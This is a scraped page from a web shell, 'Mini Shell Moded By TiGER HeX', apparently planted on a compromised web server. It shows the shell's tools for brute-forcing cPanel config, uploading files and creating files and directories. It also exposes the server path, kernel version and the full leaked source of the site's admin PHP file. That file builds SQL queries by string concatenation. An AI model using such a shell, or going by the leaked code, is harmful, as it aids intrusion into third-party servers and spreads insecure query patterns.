Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
ridazz
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/ridazz/admin/eventApprove.php~
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon2.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('includes/appTop2.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } if( isset($_REQUEST['approve']) || isset($_REQUEST['delete']) ){ //loop through all while(list($key,$value) = each($_REQUEST)){ if(eregi("story_",$key)){ $ids = explode("_",$db->sanitize_input($key)); if(isset($_REQUEST['approve'])){ $sql = "UPDATE 50mm_stories SET approved = 1 WHERE story_id = '".$ids[1]."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } }else if(isset($_REQUEST['delete'])){ $sql = "DELETE FROM 50mm_stories WHERE story_id = '".$ids[1]."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $sql = "DELETE FROM 50mm_embed WHERE story_id = '".$ids[1]."'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } } } } } include_once('includes/header.php'); ?> <form action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data"> <? //content $sql = "SELECT s.story_id,s.story_title,s.story_body,s.entry_time FROM 50mm_stories s WHERE approved = 0"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $modrows = Array(); while ($row = $db->sql_fetchrow($result)){ $id = $row['story_id']; $row['story_body'] = get_trim_string($row['story_body']); $row['story_title'] = get_trim_string($row['story_title']); $imgsql = "SELECT image FROM 50mm_embed WHERE story_id = '$id' LIMIT 1"; if( !($imgresult = $db->sql_query($imgsql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $imgrow = $db->sql_fetchrow($imgresult); if(is_file(ROOT_DIR.STORY_LIMG_DIR.$imgrow['image'])){ $img_info = getimagesize(ROOT_DIR.STORY_LIMG_DIR.$imgrow['image']); //width is greater so scale width if($img_info[0] > $img_info[1]){ $scale = $img_info[0]/50; }else{ $scale = $img_info[1]/50; } $w = round($img_info[0]/$scale); $h = round($img_info[1]/$scale); $js = "popImage('".urlencode(STORY_LIMG_DIR.$imgrow['image'])."','".$img_info[0]."','".$img_info[1]."');"; $row['image'] = "<img src=\"".STORY_SIMG_DIR.$imgrow['image']."\" border=\"0\" width=\"$w\" height=\"$h\" style=\"cursor:pointer;\" onClick=\"".$js."\">"; }else{ $row['image'] = "no image on disk"; } $xtras['view'] = "<a href=\"#\" onClick=\"window.open('viewStory.php?storyId=".$id."','storyPreview');\">view</a>"; if(has_permission("eventEdit")){ $xtras['edit'] = "<a href=\"eventEdit.php?storyId=$id\">edit</a>"; } if(has_permission("eventDelete")){ $xtras['approve \ delete'] = "<input type=\"checkbox\" name=\"story_".$id."\" value=\"\">"; }else{ $xtras['approve'] = "<input type=\"checkbox\" name=\"story_".$id."\" value=\"\">"; } //unset($row['image']); $all = array_merge($row,$xtras); array_push($modrows, $all); } echo(get_table($modrows)); ?> <input type="checkbox" name="selectAll" onClick="return checkUncheckAll(this.form);"> Select/Deselect All<br> <? if(has_permission("eventDelete")){ $submit = "<input class=\"button\" type=\"submit\" name=\"delete\" value=\"Delete Selected\" onClick=\"return validateDelete(this.form);\"> "; echo $submit; } ?> <input class="button" type="submit" name="approve" value="Approve Selected"> </form> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>